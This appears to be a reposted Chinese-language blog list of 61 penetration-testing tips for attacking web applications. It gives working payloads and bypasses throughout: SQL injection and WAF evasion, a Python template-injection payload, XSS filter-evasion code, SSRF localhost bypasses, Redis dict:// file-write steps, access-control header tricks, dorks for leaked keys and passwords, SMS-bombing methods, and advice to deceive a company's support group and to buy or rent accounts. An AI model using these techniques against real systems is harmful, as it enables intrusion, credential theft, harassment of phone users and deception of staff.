1、如果提示缺少引數,如{msg:params error},可嘗使用字典模糊測驗構造引數,進一步攻擊,
2、程式溢位,int最大值為2147483647,可嘗試使用該值進行整數溢位,觀察現象,
3、403,404回應不灰心,嘗試使用dirsearch等工具探測目錄,
4、驗證碼簡單繞過:重復使用,萬能驗證碼(0000,8888),空驗證碼,驗證碼可識別(可用PKAV HTTP Fuzzer工具識別等)
5、短信轟炸繞過:手機號前加+86有可能會繞過,手機號輸入郵箱,郵箱處輸入手機號
6、如果驗證碼有實效,可嘗試一段時間內重復發送獲取驗證碼,因為有實效,所以有可能會延長驗證碼的時長,
7、SQL注入時,如果資料庫是Mysql,可以嘗試使用&&替換and,如:’ && ‘1’=‘1,’ %26%26 ‘1’='1,
8、SQL注入時,如果資料庫是Mysql,waf過濾了=,可嘗試用like替代,如:and 1 like 1
9、JWT格式在jwt.calebb.net/可以解密,前提是要知道秘鑰,可以嘗試構造任意資料,看他會不會有報錯資訊中攜帶秘鑰資訊,可以通過github.com/firebase/php生成JWT,
JWT格式header.payload.signature
10、如果開放了redis服務(1234埠),可以嘗試使用/actuator/redis/info陳述句看是否能讀取敏感資訊,如:xxx.com:1234/actuator/r
11、Gitlab平臺漏洞 - CVE-2020-10977
12、API介面處,可以自己構造引數,POST形式傳參,可以嘗試構造為JSON格式,記得添加content-type: application/json,一些可嘗試引數,page,size,id,
13、手機發送短信時間限制的話,可以在手機號前嘗試使用特殊字符,或空格,
-
他的邏輯應該是這樣的,用戶輸入手機號——>后端判斷該手機號是否在30秒或者60秒內請求過——>如果沒有,判斷發送過來的手機號是夠是11位的純數字
-
如果不是,去掉非數字字符——>和資料庫中的手機號比對,是夠存在于資料庫中,如果存在那么向該手機發送驗證碼,
14、圖片驗證碼可設定為空,如:code=undefined
15、自動以驗證碼內容,觀察Cookie中,引數中是否有發送給用戶的內容,可以嘗試更改,可以構造釣魚鏈接,
16、模板注入,在{{xxx}}中輸入的命令引數可被執行,如:
www.baidu.com/{{1+1}}
以Python為例,列出當前目錄下所有檔案的Payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
17、資訊收集,在搜狗搜索中選擇微信可以搜索相關企業相關公眾號資產,
18、在JS檔案中搜索關鍵字API,Swagger UI等等,嘗試尋找API介面地址,
19、swagger介面常見路徑:
/swagger/
/api/swagger/
/swagger/ui/
/api/swagger/ui/
/swagger-ui.html/
/api/swagger-ui.html/
/user/swagger-ui.html/
/swagger/ui/
/api/swagger/ui/
/libs/swaggerui/
/api/swaggerui/
/swagger-resources/configuration/ui/
/swagger-resources/configuration/security/
20、swagger組件特征固定title:Swagger UI
21、盲測目錄是否存在,如果存在該目錄可能會自動在URL末尾添加/補全,
22、Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0
23、獲取賬號:文庫,QQ群,github泄露,借/租/買賬號,
24、如果泄露阿里云的 AKSK,可以使用AKSKtools工具進一步利用,
xz.aliyun.com/t/842925、如果遇見后臺頁面一閃而過,接著讓你登錄,一般使用了權限認證方式,可以用一下方式進行繞過,或者遇見401,403,302,都可以嘗試使用以下方法:
一、GET /xxx HTTP/1.1 à403
Host: test.com
繞過:
GET /xxx HTTP/1.1 à200
Host: test.com
X-Original-URL: /xxx
二、GET /xxx HTTP/1.1 à403
Host: test.com
繞過:
GET /xxx HTTP/1.1 à200
Host: test.com
Referer: http://test.com/xxx
三、302跳轉:攔截并drop跳轉的資料包,使其停留在當前頁面,
四、前端驗證:只需要刪掉對應的遮擋模塊,或者是驗證模塊的前端代碼,
26、一款生成gopher協議payload的工具:
https://github.com/firebroo/sec_tools
27、Dict協議寫入流程:
- 寫入內容;
dict://127.0.0.1:6379/set?test
- 設定保存路徑;
dict://127.0.0.1:6379/config:set:dir:/tmp/
- 設定保存檔案名;
dict://127.0.0.1:6379/config:set:dbfilename:1.png
- 保存,
dict://127.0.0.1:6379/save
28、CentOS 7系統利用suid提權獲取Root Shell
https://www.freebuf.com/articles/system/244627.html
29、xss中標簽利用的payload:
<a href=javascript:alert(1)>xx</a>
30、XSS過濾了單引號,等號可以:
①、使用:String.fromCharCode(97,108,101,114,116,40,49,41);
為alert(1),該方法輸出的結果為字串,可以使用eval()進行執行,即彈框操作
eval(String.fromCharCode(97,108,101,114,116,40,49,41));
②、atob函式:
eval(atobYWxlcnQoMSk=) 為 eval(atobalert(1)) 其中`為反引號
31、XSS過濾了單引號,等號以及圓括號,eval:
①、過濾了eval函式可以用其他函式去繞過,如:Function,constructor
Functiona${atobYWxlcnQoMSk=}``` ``.constructor.constructora${atobYWxlcnQoMSk=}```
32、可使用下面命令查看是否處在docker虛擬機中
cat /proc/1/cgroup
33、萬能密碼試試’=0#34、CORS漏洞驗證,可以使用curl來驗證:
curl https://www.xxxx.com -H "Origin: https://test.com" -I
檢查回傳包的 Access-Control-Allow-Origin 欄位是否為https://test.com
35、在盲測目標系統是否為Shiro時,可以在Cookie中手動構造rememebrMe=xxx
如果回傳包中Set-Cookie中存在rememberMe=deleteMe,則證明該系統使用了Shiro,因此可以進一步攻擊,
36、使用正則獲取網站中所包含的其他URL:
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
37、常見的一些遠程命令執行(RCE)引數,詳情,請看dicts目錄下的RCE-extentions.txt檔案,
38、繞過SSRF防護的幾個小方法:
A、繞過SSRF限制通過CIDR,如:
http://127.127.127.127
http://127.0.0.0
B、不完整的地址,如:
http://127.1
http://0
C、將地址結合在通過特殊字符結合在一起,如:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3
D、繞過決議器,如:
http://127.1.1.1:80@127.2.2.2:80/
E、繞過localhost通過[::],如:
http://[::]:80/
http://0000::1:80/
39、幾個常用的Google語法:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
40、通過favicon的hash來對比相關聯的兩個網站:
腳本地址:https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py
命令:python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
41、一些本地包含引數,詳情請看dicts目錄下的LFI-extentions.txt檔案,
42、在JavaScript檔案中可以找一些隱藏的GET引數,比如:
首先,在js檔案中找到一些變數,比如:var test=“xss”
然后,可以嘗試使用GET方法構造每一個引數,比如:
https://example.com/?test=”xsstest
本方法可能會發現一些XSS
43、使用github dorks幫助我們尋找一些敏感資訊,比如:
extension:pem private
extension:ppk private
extension:sql mysql dump password
extension:json api.forecast.io
extension:json mongolab.com
extension:yaml mongolab.com
extension:ica [WFClient] Password=
extension:avastlic “support.avast.com”
extension:js jsforce conn.login
extension:json googleusercontent client_secret
“target.com” send_keys
“target.com” password
“target.com” api_key
“target.com” apikey
“target.com” jira_password
“target.com” root_password
“target.com” access_token
“target.com” config
“target.com” client_secret
“target.com” user auth
通過上述語法,可以搜索到一些敏感的私鑰,一些SSH登錄私鑰,mysql的資料庫密碼,API key等等,
另外推薦一個腳本:https://github.com/techgaun/github-dorks
44、SSRF常見的引數,詳情請看dicts目錄下的SSRF-extensions.txt檔案,
45、通過添加.json后綴,泄露一些敏感資訊,比如:
一次正常請求:
GET /ResetPassword HTTP/1.1
{"email":"victim@example.com"}
回應:
HTTP/1.1 200 OK
添加.json后綴的請求:
GET /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}
回應:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
原鏈接:https://twitter.com/SalahHasoneh1/status/1293918353971531776
46、如果回應為401,可以試試在請求頭中添加X-Custom-IP-Authorization: 127.0.0.1
47、至于登陸后臺的網站,如果有重置密碼功能,但被禁用了,可以找該公司技術qq群,假裝用戶忘記密碼,提重置密碼需求,讓開通功能,可以驗證下是否有任意密碼重置漏洞,
48、如果遇見后臺頁面一閃而過,接著讓你登錄,一般使用了權限認證方式:
49,302跳轉:攔截并drop跳轉的資料包,使其停留在當前頁面,
這個操作每次試都是不成功的,但是可以修改回傳的302為200,然后洗掉掉Location欄位,
50、任意檔案下載:/porc/self/cmdline --當前行程的cmdline引數,/var/lib/mlocate/mlocate.db --全檔案路徑,
51、容易發生短信轟炸的幾個業務場景以及繞過方法:
①:登錄處
②:注冊處
③:找回密碼處
④:系結處
⑤:活動領取處
⑥:獨特功能處
⑦:反饋處
一般繞過限制方法:
手機號碼前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符號等
修改cookie,變數,回傳
138888888889 12位經過短信網關取前11位,導致短信轟炸
52、注入的時候可以試試–%0a union --%0a select 嘗試繞過,
53、注入的時候,多看order by,group by,{$var},
54、手機號前加若干+會造成短信轟炸,
55、如果在旁站中發現短信驗證碼在response中出現,可以試試主站或者其他站點中驗證碼是否通用,
56、獲取短信驗證碼時,用逗號隔開兩個手機號,有可能兩個手機號能獲取到同一個驗證碼,
57、測驗注入and ord(0x1)->true,and ord(0x0)->false,
58、遇到檔案讀取漏洞,除了讀取組態檔,還可以嘗試讀取網站檔案,來進行代碼審計,說不定就有開發疏忽的漏洞在源代碼里,
59、使用python快速開啟http服務器:
基于python2.x,命令如下:
python -m SimpleHTTPServer 8000
在當前目錄起個 8000 埠的 HTTP 服務
基于python3.x,命令如下:
python -m http.server 8000
60、滲透時盡量不要暴露自己的 IP 地址,掛代理是必須的,
linux 下要查看自己終端是否走代理可以 curlifconfig.me/看下回傳的 IP 地址,
windows 就直接訪問ifconfig.me/即可
61、整理字典時,推薦用linux下的工具快速合并和去重,
cat file1.txt file2.txt fileN.txt > out.txt
sort out.txt | uniq > out2.txt
轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/348488.html
標籤:其他